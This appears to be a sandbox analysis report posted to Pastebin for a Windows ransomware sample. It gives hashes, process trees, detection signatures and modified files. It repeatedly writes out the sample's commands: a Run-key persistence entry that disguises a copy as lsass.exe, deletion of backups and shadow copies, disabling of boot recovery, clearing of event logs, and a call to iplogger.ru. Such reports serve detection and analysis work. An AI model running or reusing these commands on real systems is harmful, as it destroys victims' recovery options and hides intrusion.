Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- * ID: 2303
- * MalFamily: "Malicious"
- * MalScore: 10.0
- * File Name: "Exes_636d3c669e36510bf337fd2f1ea64732.tmp"
- * File Size: 435200
- * File Type: "PE32 executable (GUI) Intel 80386, for MS Windows"
- * SHA256: "83157309528cd13e8d0cf8aa2202449cc454de56a2e9c689c75847e0f6b7f8f4"
- * MD5: "636d3c669e36510bf337fd2f1ea64732"
- * SHA1: "288fefa5d1a74d335d508b1b36453c70071c19b2"
- * SHA512: "a234bd046d8f4f8f73885570c7a5c582b46584f96a33178e70e0930c1dfbaa25ebe436e65002df338fccf6b6999c842947a6e6e8f108a738d50a6bd2ffd279a0"
- * CRC32: "D4F2AC3B"
- * SSDEEP: "6144:CSADzS90C6waTX9h+HkTokdKVx5n7MW2yBbbyMrkOK2qx7bys2T:CnrXb9daxZ7MW2yBbbvgHdx7b"
- * Process Execution:
- "nH3pXIYjPPePo.exe",
- "cmd.exe",
- "reg.exe",
- "lsass.exe",
- "cmd.exe",
- "cmd.exe",
- "cmd.exe",
- "cmd.exe",
- "cmd.exe",
- "cmd.exe",
- "cmd.exe",
- "WMIC.exe",
- "cmd.exe",
- "vssadmin.exe",
- "cmd.exe",
- "reg.exe",
- "cmd.exe",
- "reg.exe",
- "cmd.exe",
- "reg.exe",
- "cmd.exe",
- "attrib.exe",
- "cmd.exe",
- "cmd.exe",
- "wevtutil.exe",
- "cmd.exe",
- "wevtutil.exe",
- "cmd.exe",
- "wevtutil.exe",
- "cmd.exe",
- "sc.exe",
- "lsass.exe",
- "lsass.exe",
- "cmd.exe",
- "PING.EXE",
- "services.exe",
- "svchost.exe",
- "WmiPrvSE.exe",
- "VSSVC.exe",
- "taskhost.exe",
- "WMIADAP.exe"
- * Executed Commands:
- "\"C:\\Windows\\system32\\cmd.exe\" /e:on /c md \"C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\" & copy \"C:\\Users\\user\\AppData\\Local\\Temp\\nH3pXIYjPPePo.exe\" \"C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\lsass.exe\" & reg add \"HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\" /V \"Local Security Authority Subsystem Service\" /t REG_SZ /F /D \"\\\"C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\lsass.exe\\\" -start\"",
- "\"C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\lsass.exe\" -start",
- "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\lsass.exe -start",
- "\"C:\\Windows\\system32\\cmd.exe\" /c for /l %x in (1,1,999) do ( ping -n 3 127.1 & del \"C:\\Users\\user\\AppData\\Local\\Temp\\nH3pXIYjPPePo.exe\" & if not exist \"C:\\Users\\user\\AppData\\Local\\Temp\\nH3pXIYjPPePo.exe\" exit )",
- "C:\\Windows\\System32\\cmd.exe /c for /l %x in (1,1,999) do ( ping -n 3 127.1 & del \"C:\\Users\\user\\AppData\\Local\\Temp\\nH3pXIYjPPePo.exe\" & if not exist \"C:\\Users\\user\\AppData\\Local\\Temp\\nH3pXIYjPPePo.exe\" exit )",
- "reg add \"HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\" /V \"Local Security Authority Subsystem Service\" /t REG_SZ /F /D \"\\\"C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\lsass.exe\\\" -start\"",
- "\"C:\\Windows\\system32\\cmd.exe\" /C bcdedit /set default bootstatuspolicy ignoreallfailures",
- "\"C:\\Windows\\system32\\cmd.exe\" /C bcdedit /set default recoveryenabled no",
- "\"C:\\Windows\\system32\\cmd.exe\" /C wbadmin delete catalog -quiet",
- "\"C:\\Windows\\system32\\cmd.exe\" /C wbadmin delete systemstatebackup",
- "\"C:\\Windows\\system32\\cmd.exe\" /C wbadmin delete systemstatebackup -keepversions:0",
- "\"C:\\Windows\\system32\\cmd.exe\" /C wbadmin delete backup",
- "\"C:\\Windows\\system32\\cmd.exe\" /C wmic shadowcopy delete",
- "\"C:\\Windows\\system32\\cmd.exe\" /C vssadmin delete shadows /all /quiet",
- "\"C:\\Windows\\system32\\cmd.exe\" /C reg delete \"HKEY_CURRENT_USER\\Software\\Microsoft\\Terminal Server Client\\Default\" /va /f",
- "\"C:\\Windows\\system32\\cmd.exe\" /C reg delete \"HKEY_CURRENT_USER\\Software\\Microsoft\\Terminal Server Client\\Servers\" /f",
- "\"C:\\Windows\\system32\\cmd.exe\" /C reg add \"HKEY_CURRENT_USER\\Software\\Microsoft\\Terminal Server Client\\Servers\"",
- "\"C:\\Windows\\system32\\cmd.exe\" /C attrib \"%userprofile%\\documents\\Default.rdp\" -s -h",
- "\"C:\\Windows\\system32\\cmd.exe\" /C del \"%userprofile%\\documents\\Default.rdp\"",
- "\"C:\\Windows\\system32\\cmd.exe\" /C wevtutil.exe clear-log Application",
- "\"C:\\Windows\\system32\\cmd.exe\" /C wevtutil.exe clear-log Security",
- "\"C:\\Windows\\system32\\cmd.exe\" /C wevtutil.exe clear-log System",
- "\"C:\\Windows\\system32\\cmd.exe\" /C sc config eventlog start=disabled",
- "\"C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\lsass.exe\" -agent 0",
- "\"C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\lsass.exe\" -agent 1",
- "C:\\Windows\\system32\\PING.EXE ping -n 3 127.1",
- "C:\\Windows\\System32\\Wbem\\WMIC.exe wmic shadowcopy delete",
- "C:\\Windows\\sysWOW64\\wbem\\wmiprvse.exe -secured -Embedding",
- "C:\\Windows\\system32\\vssvc.exe",
- "vssadmin delete shadows /all /quiet",
- "reg delete \"HKEY_CURRENT_USER\\Software\\Microsoft\\Terminal Server Client\\Default\" /va /f",
- "reg delete \"HKEY_CURRENT_USER\\Software\\Microsoft\\Terminal Server Client\\Servers\" /f",
- "reg add \"HKEY_CURRENT_USER\\Software\\Microsoft\\Terminal Server Client\\Servers\"",
- "attrib \"C:\\Users\\user\\documents\\Default.rdp\" -s -h",
- "wevtutil.exe clear-log Application",
- "wevtutil.exe clear-log Security",
- "wevtutil.exe clear-log System",
- "sc config eventlog start=disabled"
- * Signatures Detected:
- "Description": "Behavioural detection: Executable code extraction",
- "Details":
- "Description": "SetUnhandledExceptionFilter detected (possible anti-debug)",
- "Details":
- "Description": "Executed a command line with /C or /R argument to terminate command shell on completion which can be used to hide execution",
- "Details":
- "command": "\"C:\\Windows\\system32\\cmd.exe\" /e:on /c md \"C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\" & copy \"C:\\Users\\user\\AppData\\Local\\Temp\\nH3pXIYjPPePo.exe\" \"C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\lsass.exe\" & reg add \"HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\" /V \"Local Security Authority Subsystem Service\" /t REG_SZ /F /D \"\\\"C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\lsass.exe\\\" -start\""
- "command": "\"C:\\Windows\\system32\\cmd.exe\" /C bcdedit /set default bootstatuspolicy ignoreallfailures"
- "command": "\"C:\\Windows\\system32\\cmd.exe\" /C bcdedit /set default recoveryenabled no"
- "command": "\"C:\\Windows\\system32\\cmd.exe\" /C wbadmin delete catalog -quiet"
- "command": "\"C:\\Windows\\system32\\cmd.exe\" /C wbadmin delete systemstatebackup"
- "command": "\"C:\\Windows\\system32\\cmd.exe\" /C wbadmin delete systemstatebackup -keepversions:0"
- "command": "\"C:\\Windows\\system32\\cmd.exe\" /C wbadmin delete backup"
- "command": "\"C:\\Windows\\system32\\cmd.exe\" /C wmic shadowcopy delete"
- "command": "\"C:\\Windows\\system32\\cmd.exe\" /C vssadmin delete shadows /all /quiet"
- "command": "\"C:\\Windows\\system32\\cmd.exe\" /C reg delete \"HKEY_CURRENT_USER\\Software\\Microsoft\\Terminal Server Client\\Default\" /va /f"
- "command": "\"C:\\Windows\\system32\\cmd.exe\" /C reg delete \"HKEY_CURRENT_USER\\Software\\Microsoft\\Terminal Server Client\\Servers\" /f"
- "command": "\"C:\\Windows\\system32\\cmd.exe\" /C reg add \"HKEY_CURRENT_USER\\Software\\Microsoft\\Terminal Server Client\\Servers\""
- "command": "\"C:\\Windows\\system32\\cmd.exe\" /C attrib \"%userprofile%\\documents\\Default.rdp\" -s -h"
- "command": "\"C:\\Windows\\system32\\cmd.exe\" /C del \"%userprofile%\\documents\\Default.rdp\""
- "command": "\"C:\\Windows\\system32\\cmd.exe\" /C wevtutil.exe clear-log Application"
- "command": "\"C:\\Windows\\system32\\cmd.exe\" /C wevtutil.exe clear-log Security"
- "command": "\"C:\\Windows\\system32\\cmd.exe\" /C wevtutil.exe clear-log System"
- "command": "\"C:\\Windows\\system32\\cmd.exe\" /C sc config eventlog start=disabled"
- "Description": "Creates RWX memory",
- "Details":
- "Description": "Possible date expiration check, exits too soon after checking local time",
- "Details":
- "process": "nH3pXIYjPPePo.exe, PID 2244"
- "Description": "A process attempted to delay the analysis task.",
- "Details":
- "Process": "WmiPrvSE.exe tried to sleep 420 seconds, actually delayed analysis time by 0 seconds"
- "Description": "Performs HTTP requests potentially not found in PCAP.",
- "Details":
- "url_ioc": "iplogger.ru:80/1Oh8E.jpeg"
- "Description": "A process created a hidden window",
- "Details":
- "Process": "nH3pXIYjPPePo.exe -> C:\\Windows\\System32\\cmd.exe"
- "Description": "Executed a command line with /V argument which modifies variable behaviour and whitespace allowing for increased obfuscation options",
- "Details":
- "command": "\"C:\\Windows\\system32\\cmd.exe\" /e:on /c md \"C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\" & copy \"C:\\Users\\user\\AppData\\Local\\Temp\\nH3pXIYjPPePo.exe\" \"C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\lsass.exe\" & reg add \"HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\" /V \"Local Security Authority Subsystem Service\" /t REG_SZ /F /D \"\\\"C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\lsass.exe\\\" -start\""
- "Description": "Executed a very long command line or script command which may be indicative of chained commands or obfuscation",
- "Details":
- "command": "\"C:\\Windows\\system32\\cmd.exe\" /e:on /c md \"C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\" & copy \"C:\\Users\\user\\AppData\\Local\\Temp\\nH3pXIYjPPePo.exe\" \"C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\lsass.exe\" & reg add \"HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\" /V \"Local Security Authority Subsystem Service\" /t REG_SZ /F /D \"\\\"C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\lsass.exe\\\" -start\""
- "Description": "Drops a binary and executes it",
- "Details":
- "binary": "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\lsass.exe"
- "Description": "A ping command was executed with the -n argument possibly to delay analysis",
- "Details":
- "command": "\"C:\\Windows\\system32\\cmd.exe\" /c for /l %x in (1,1,999) do ( ping -n 3 127.1 & del \"C:\\Users\\user\\AppData\\Local\\Temp\\nH3pXIYjPPePo.exe\" & if not exist \"C:\\Users\\user\\AppData\\Local\\Temp\\nH3pXIYjPPePo.exe\" exit )"
- "command": "C:\\Windows\\System32\\cmd.exe /c for /l %x in (1,1,999) do ( ping -n 3 127.1 & del \"C:\\Users\\user\\AppData\\Local\\Temp\\nH3pXIYjPPePo.exe\" & if not exist \"C:\\Users\\user\\AppData\\Local\\Temp\\nH3pXIYjPPePo.exe\" exit )"
- "command": "C:\\Windows\\system32\\PING.EXE ping -n 3 127.1"
- "Description": "Uses Windows utilities for basic functionality",
- "Details":
- "command": "\"C:\\Windows\\system32\\cmd.exe\" /e:on /c md \"C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\" & copy \"C:\\Users\\user\\AppData\\Local\\Temp\\nH3pXIYjPPePo.exe\" \"C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\lsass.exe\" & reg add \"HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\" /V \"Local Security Authority Subsystem Service\" /t REG_SZ /F /D \"\\\"C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\lsass.exe\\\" -start\""
- "command": "\"C:\\Windows\\system32\\cmd.exe\" /e:on /c md \"C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\" & copy \"C:\\Users\\user\\AppData\\Local\\Temp\\nH3pXIYjPPePo.exe\" \"C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\lsass.exe\" & reg add \"HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\" /V \"Local Security Authority Subsystem Service\" /t REG_SZ /F /D \"\\\"C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\lsass.exe\\\" -start\""
- "command": "\"C:\\Windows\\system32\\cmd.exe\" /e:on /c md \"C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\" & copy \"C:\\Users\\user\\AppData\\Local\\Temp\\nH3pXIYjPPePo.exe\" \"C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\lsass.exe\" & reg add \"HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\" /V \"Local Security Authority Subsystem Service\" /t REG_SZ /F /D \"\\\"C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\lsass.exe\\\" -start\""
- "command": "\"C:\\Windows\\system32\\cmd.exe\" /e:on /c md \"C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\" & copy \"C:\\Users\\user\\AppData\\Local\\Temp\\nH3pXIYjPPePo.exe\" \"C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\lsass.exe\" & reg add \"HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\" /V \"Local Security Authority Subsystem Service\" /t REG_SZ /F /D \"\\\"C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\lsass.exe\\\" -start\""
- "command": "\"C:\\Windows\\system32\\cmd.exe\" /c for /l %x in (1,1,999) do ( ping -n 3 127.1 & del \"C:\\Users\\user\\AppData\\Local\\Temp\\nH3pXIYjPPePo.exe\" & if not exist \"C:\\Users\\user\\AppData\\Local\\Temp\\nH3pXIYjPPePo.exe\" exit )"
- "command": "\"C:\\Windows\\system32\\cmd.exe\" /c for /l %x in (1,1,999) do ( ping -n 3 127.1 & del \"C:\\Users\\user\\AppData\\Local\\Temp\\nH3pXIYjPPePo.exe\" & if not exist \"C:\\Users\\user\\AppData\\Local\\Temp\\nH3pXIYjPPePo.exe\" exit )"
- "command": "C:\\Windows\\System32\\cmd.exe /c for /l %x in (1,1,999) do ( ping -n 3 127.1 & del \"C:\\Users\\user\\AppData\\Local\\Temp\\nH3pXIYjPPePo.exe\" & if not exist \"C:\\Users\\user\\AppData\\Local\\Temp\\nH3pXIYjPPePo.exe\" exit )"
- "command": "C:\\Windows\\System32\\cmd.exe /c for /l %x in (1,1,999) do ( ping -n 3 127.1 & del \"C:\\Users\\user\\AppData\\Local\\Temp\\nH3pXIYjPPePo.exe\" & if not exist \"C:\\Users\\user\\AppData\\Local\\Temp\\nH3pXIYjPPePo.exe\" exit )"
- "command": "reg add \"HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\" /V \"Local Security Authority Subsystem Service\" /t REG_SZ /F /D \"\\\"C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\lsass.exe\\\" -start\""
- "command": "\"C:\\Windows\\system32\\cmd.exe\" /C bcdedit /set default bootstatuspolicy ignoreallfailures"
- "command": "\"C:\\Windows\\system32\\cmd.exe\" /C bcdedit /set default bootstatuspolicy ignoreallfailures"
- "command": "\"C:\\Windows\\system32\\cmd.exe\" /C bcdedit /set default recoveryenabled no"
- "command": "\"C:\\Windows\\system32\\cmd.exe\" /C bcdedit /set default recoveryenabled no"
- "command": "\"C:\\Windows\\system32\\cmd.exe\" /C wbadmin delete catalog -quiet"
- "command": "\"C:\\Windows\\system32\\cmd.exe\" /C wbadmin delete systemstatebackup"
- "command": "\"C:\\Windows\\system32\\cmd.exe\" /C wbadmin delete systemstatebackup -keepversions:0"
- "command": "\"C:\\Windows\\system32\\cmd.exe\" /C wbadmin delete backup"
- "command": "\"C:\\Windows\\system32\\cmd.exe\" /C wmic shadowcopy delete"
- "command": "\"C:\\Windows\\system32\\cmd.exe\" /C wmic shadowcopy delete"
- "command": "\"C:\\Windows\\system32\\cmd.exe\" /C wmic shadowcopy delete"
- "command": "\"C:\\Windows\\system32\\cmd.exe\" /C vssadmin delete shadows /all /quiet"
- "command": "\"C:\\Windows\\system32\\cmd.exe\" /C reg delete \"HKEY_CURRENT_USER\\Software\\Microsoft\\Terminal Server Client\\Default\" /va /f"
- "command": "\"C:\\Windows\\system32\\cmd.exe\" /C reg delete \"HKEY_CURRENT_USER\\Software\\Microsoft\\Terminal Server Client\\Default\" /va /f"
- "command": "\"C:\\Windows\\system32\\cmd.exe\" /C reg delete \"HKEY_CURRENT_USER\\Software\\Microsoft\\Terminal Server Client\\Default\" /va /f"
- "command": "\"C:\\Windows\\system32\\cmd.exe\" /C reg delete \"HKEY_CURRENT_USER\\Software\\Microsoft\\Terminal Server Client\\Servers\" /f"
- "command": "\"C:\\Windows\\system32\\cmd.exe\" /C reg delete \"HKEY_CURRENT_USER\\Software\\Microsoft\\Terminal Server Client\\Servers\" /f"
- "command": "\"C:\\Windows\\system32\\cmd.exe\" /C reg delete \"HKEY_CURRENT_USER\\Software\\Microsoft\\Terminal Server Client\\Servers\" /f"
- "command": "\"C:\\Windows\\system32\\cmd.exe\" /C reg add \"HKEY_CURRENT_USER\\Software\\Microsoft\\Terminal Server Client\\Servers\""
- "command": "\"C:\\Windows\\system32\\cmd.exe\" /C reg add \"HKEY_CURRENT_USER\\Software\\Microsoft\\Terminal Server Client\\Servers\""
- "command": "\"C:\\Windows\\system32\\cmd.exe\" /C reg add \"HKEY_CURRENT_USER\\Software\\Microsoft\\Terminal Server Client\\Servers\""
- "command": "\"C:\\Windows\\system32\\cmd.exe\" /C attrib \"%userprofile%\\documents\\Default.rdp\" -s -h"
- "command": "\"C:\\Windows\\system32\\cmd.exe\" /C attrib \"%userprofile%\\documents\\Default.rdp\" -s -h"
- "command": "\"C:\\Windows\\system32\\cmd.exe\" /C del \"%userprofile%\\documents\\Default.rdp\""
- "command": "\"C:\\Windows\\system32\\cmd.exe\" /C wevtutil.exe clear-log Application"
- "command": "\"C:\\Windows\\system32\\cmd.exe\" /C wevtutil.exe clear-log Security"
- "command": "\"C:\\Windows\\system32\\cmd.exe\" /C wevtutil.exe clear-log System"
- "command": "\"C:\\Windows\\system32\\cmd.exe\" /C sc config eventlog start=disabled"
- "command": "\"C:\\Windows\\system32\\cmd.exe\" /C sc config eventlog start=disabled"
- "command": "C:\\Windows\\system32\\PING.EXE ping -n 3 127.1"
- "command": "C:\\Windows\\System32\\Wbem\\WMIC.exe wmic shadowcopy delete"
- "command": "C:\\Windows\\System32\\Wbem\\WMIC.exe wmic shadowcopy delete"
- "command": "reg delete \"HKEY_CURRENT_USER\\Software\\Microsoft\\Terminal Server Client\\Default\" /va /f"
- "command": "reg delete \"HKEY_CURRENT_USER\\Software\\Microsoft\\Terminal Server Client\\Default\" /va /f"
- "command": "reg delete \"HKEY_CURRENT_USER\\Software\\Microsoft\\Terminal Server Client\\Servers\" /f"
- "command": "reg delete \"HKEY_CURRENT_USER\\Software\\Microsoft\\Terminal Server Client\\Servers\" /f"
- "command": "reg add \"HKEY_CURRENT_USER\\Software\\Microsoft\\Terminal Server Client\\Servers\""
- "command": "reg add \"HKEY_CURRENT_USER\\Software\\Microsoft\\Terminal Server Client\\Servers\""
- "command": "attrib \"C:\\Users\\user\\documents\\Default.rdp\" -s -h"
- "command": "sc config eventlog start=disabled"
- "Description": "Attempts to delete volume shadow copies",
- "Details":
- "Description": "Deletes its original binary from disk",
- "Details":
- "Description": "Attempts to repeatedly call a single API many times in order to delay analysis time",
- "Details":
- "Spam": "services.exe (504) called API GetSystemTimeAsFileTime 126917 times"
- "Description": "Modifies boot configuration settings",
- "Details":
- "disables_system_recovery": "Modifies the boot configuration to disable startup recovery"
- "ignorefailures": "Modifies the boot configuration to disable Windows error recovery"
- "Description": "A system process is generating network traffic likely as a result of process injection",
- "Details":
- "http_request": "lsass.exe_InternetConnectA_iplogger.ru"
- "http_request_path": "lsass.exe_HttpOpenRequestA_1Oh8E.jpeg"
- "Description": "Installs itself for autorun at Windows startup",
- "Details":
- "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\Local Security Authority Subsystem Service"
- "data": "\"C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\lsass.exe\" -start"
- "Description": "Writes a potential ransom message to disk",
- "Details":
- "ransom_file": "!!! ALL YOUR FILES ARE ENCRYPTED !!!.TXT"
- "Description": "File has been identified by 15 Antiviruses on VirusTotal as malicious",
- "Details":
- "Cylance": "Unsafe"
- "CrowdStrike": "win/malicious_confidence_100% (D)"
- "Symantec": "ML.Attribute.HighConfidence"
- "APEX": "Malicious"
- "Endgame": "malicious (high confidence)"
- "Invincea": "heuristic"
- "McAfee-GW-Edition": "BehavesLike.Win32.PWSQQPass.gh"
- "FireEye": "Generic.mg.636d3c669e36510b"
- "SentinelOne": "DFI - Malicious PE"
- "Microsoft": "Trojan:Win32/Suloc.A"
- "Acronis": "suspicious"
- "VBA32": "Malware-Cryptor.General.3"
- "Rising": "Trojan.Generic@ML.100 (RDML:kwEnH7CqjV0yUM4V3OzqNQ)"
- "Cybereason": "malicious.5d1a74"
- "Qihoo-360": "HEUR/QVM19.1.F7E7.Malware.Gen"
- "Description": "Detects VirtualBox through the presence of a file",
- "Details":
- "file": "C:\\Program Files\\BLAOracle\\VirtualBox Guest Additions\\VBoxGuest.cat"
- "file": "C:\\Program Files\\BLAOracle\\VirtualBox Guest Additions\\VBoxGuest.inf"
- "file": "C:\\Program Files\\BLAOracle\\VirtualBox Guest Additions\\VBoxMouse.inf"
- "file": "C:\\Program Files\\BLAOracle\\VirtualBox Guest Additions\\VBoxMouse.cat"
- "file": "C:\\Program Files\\BLAOracle\\VirtualBox Guest Additions\\VBoxVideo.inf"
- "file": "C:\\Program Files\\BLAOracle\\VirtualBox Guest Additions\\VBoxVideo.cat"
- "Description": "Clears Windows events or logs",
- "Details":
- "command": "\"C:\\Windows\\system32\\cmd.exe\" /C wevtutil.exe clear-log Application"
- "command": "\"C:\\Windows\\system32\\cmd.exe\" /C wevtutil.exe clear-log Security"
- "command": "\"C:\\Windows\\system32\\cmd.exe\" /C wevtutil.exe clear-log System"
- "command": "wevtutil.exe clear-log Application"
- "command": "wevtutil.exe clear-log Security"
- "command": "wevtutil.exe clear-log System"
- "Description": "Appears to use character obfuscation in a command line",
- "Details":
- "command": "\"C:\\Windows\\system32\\cmd.exe\" /e:on /c md \"C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\" & copy \"C:\\Users\\user\\AppData\\Local\\Temp\\nH3pXIYjPPePo.exe\" \"C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\lsass.exe\" & reg add \"HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\" /V \"Local Security Authority Subsystem Service\" /t REG_SZ /F /D \"\\\"C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\lsass.exe\\\" -start\""
- "Description": "Creates a copy of itself",
- "Details":
- "copy": "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\lsass.exe"
- "Description": "Anomalous binary characteristics",
- "Details":
- "anomaly": "Found duplicated section names"
- "Description": "Uses suspicious command line tools or Windows utilities",
- "Details":
- "command": "\"C:\\Windows\\system32\\cmd.exe\" /c for /l %x in (1,1,999) do ( ping -n 3 127.1 & del \"C:\\Users\\user\\AppData\\Local\\Temp\\nH3pXIYjPPePo.exe\" & if not exist \"C:\\Users\\user\\AppData\\Local\\Temp\\nH3pXIYjPPePo.exe\" exit )"
- "command": "C:\\Windows\\System32\\cmd.exe /c for /l %x in (1,1,999) do ( ping -n 3 127.1 & del \"C:\\Users\\user\\AppData\\Local\\Temp\\nH3pXIYjPPePo.exe\" & if not exist \"C:\\Users\\user\\AppData\\Local\\Temp\\nH3pXIYjPPePo.exe\" exit )"
- "command": "\"C:\\Windows\\system32\\cmd.exe\" /C bcdedit /set default bootstatuspolicy ignoreallfailures"
- "command": "\"C:\\Windows\\system32\\cmd.exe\" /C bcdedit /set default recoveryenabled no"
- "command": "\"C:\\Windows\\system32\\cmd.exe\" /C wbadmin delete catalog -quiet"
- "command": "\"C:\\Windows\\system32\\cmd.exe\" /C wbadmin delete systemstatebackup"
- "command": "\"C:\\Windows\\system32\\cmd.exe\" /C wbadmin delete systemstatebackup -keepversions:0"
- "command": "\"C:\\Windows\\system32\\cmd.exe\" /C wbadmin delete backup"
- "command": "\"C:\\Windows\\system32\\cmd.exe\" /C vssadmin delete shadows /all /quiet"
- "command": "\"C:\\Windows\\system32\\cmd.exe\" /C del \"%userprofile%\\documents\\Default.rdp\""
- "command": "\"C:\\Windows\\system32\\cmd.exe\" /C wevtutil.exe clear-log Application"
- "command": "\"C:\\Windows\\system32\\cmd.exe\" /C wevtutil.exe clear-log Security"
- "command": "\"C:\\Windows\\system32\\cmd.exe\" /C wevtutil.exe clear-log System"
- "command": "vssadmin delete shadows /all /quiet"
- "command": "wevtutil.exe clear-log Application"
- "command": "wevtutil.exe clear-log Security"
- "command": "wevtutil.exe clear-log System"
- * Started Service:
- * Mutexes:
- "Global\\ADAP_WMI_ENTRY",
- "Global\\RefreshRA_Mutex",
- "Global\\RefreshRA_Mutex_Lib",
- "Global\\RefreshRA_Mutex_Flag"
- * Modified Files:
- "C:\\Users\\user\\AppData\\Local\\Temp\\3C20D05E.buran",
- "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\lsass.exe",
- "C:\\Users\\user\\AppData\\Local\\Temp\\4500E6C1.buran",
- "\\??\\PIPE\\wkssvc",
- "\\Device\\LanmanDatagramReceiver",
- "\\??\\PIPE\\DAV RPC SERVICE",
- "\\??\\pipe\\PIPE_EVENTROOT\\CIMV2PROVIDERSUBSYSTEM",
- "C:\\Windows\\sysnative\\LogFiles\\Scm\\5869f1c1-01d7-41f7-84b7-715672259fa8",
- "\\??\\PIPE\\samr",
- "C:\\.doc",
- "C:\\.doc.3217EE46-3DA6-888C-CFD6-E175EC571166",
- "C:\\!!! ALL YOUR FILES ARE ENCRYPTED !!!.TXT",
- "C:\\.htm",
- "C:\\.htm.3217EE46-3DA6-888C-CFD6-E175EC571166",
- "C:\\.jpeg",
- "C:\\.jpeg.3217EE46-3DA6-888C-CFD6-E175EC571166",
- "C:\\.jpg",
- "C:\\.jpg.3217EE46-3DA6-888C-CFD6-E175EC571166",
- "C:\\.pptx",
- "C:\\.pptx.3217EE46-3DA6-888C-CFD6-E175EC571166",
- "C:\\.txt",
- "C:\\.txt.3217EE46-3DA6-888C-CFD6-E175EC571166",
- "C:\\.xls",
- "C:\\.xls.3217EE46-3DA6-888C-CFD6-E175EC571166",
- "C:\\.zip",
- "C:\\2960.ini",
- "C:\\Host.bmp",
- "C:\\Host.bmp.3217EE46-3DA6-888C-CFD6-E175EC571166",
- "C:\\Host.docx",
- "C:\\Host.docx.3217EE46-3DA6-888C-CFD6-E175EC571166",
- "C:\\Host.html",
- "C:\\Host.html.3217EE46-3DA6-888C-CFD6-E175EC571166",
- "C:\\Host.jpeg",
- "C:\\Host.jpeg.3217EE46-3DA6-888C-CFD6-E175EC571166",
- "C:\\Host.jpg",
- "C:\\Host.jpg.3217EE46-3DA6-888C-CFD6-E175EC571166",
- "C:\\Host.pdf",
- "C:\\Host.pdf.3217EE46-3DA6-888C-CFD6-E175EC571166",
- "C:\\Program Files\\BLAOracle\\VirtualBox Guest Additions\\iexplore.ico",
- "C:\\Program Files\\BLAOracle\\VirtualBox Guest Additions\\iexplore.ico.3217EE46-3DA6-888C-CFD6-E175EC571166",
- "C:\\Program Files\\BLAOracle\\VirtualBox Guest Additions\\!!! ALL YOUR FILES ARE ENCRYPTED !!!.TXT",
- "C:\\Program Files\\BLAOracle\\VirtualBox Guest Additions\\Oracle VM VirtualBox Guest Additions.url",
- "C:\\Program Files\\BLAOracle\\VirtualBox Guest Additions\\Oracle VM VirtualBox Guest Additions.url.3217EE46-3DA6-888C-CFD6-E175EC571166",
- "C:\\Program Files\\BLAOracle\\VirtualBox Guest Additions\\VBoxGuest.cat",
- "C:\\Program Files\\BLAOracle\\VirtualBox Guest Additions\\VBoxGuest.cat.3217EE46-3DA6-888C-CFD6-E175EC571166",
- "C:\\Program Files\\BLAOracle\\VirtualBox Guest Additions\\VBoxGuest.inf",
- "C:\\Program Files\\BLAOracle\\VirtualBox Guest Additions\\VBoxGuest.inf.3217EE46-3DA6-888C-CFD6-E175EC571166",
- "C:\\Program Files\\BLAOracle\\VirtualBox Guest Additions\\VBoxMouse.cat",
- "C:\\Program Files\\BLAOracle\\VirtualBox Guest Additions\\VBoxMouse.cat.3217EE46-3DA6-888C-CFD6-E175EC571166",
- "C:\\Program Files\\BLAOracle\\VirtualBox Guest Additions\\VBoxMouse.inf",
- "C:\\Program Files\\BLAOracle\\VirtualBox Guest Additions\\VBoxMouse.inf.3217EE46-3DA6-888C-CFD6-E175EC571166",
- "C:\\Program Files\\BLAOracle\\VirtualBox Guest Additions\\VBoxVideo.cat",
- "C:\\Program Files\\BLAOracle\\VirtualBox Guest Additions\\VBoxVideo.cat.3217EE46-3DA6-888C-CFD6-E175EC571166",
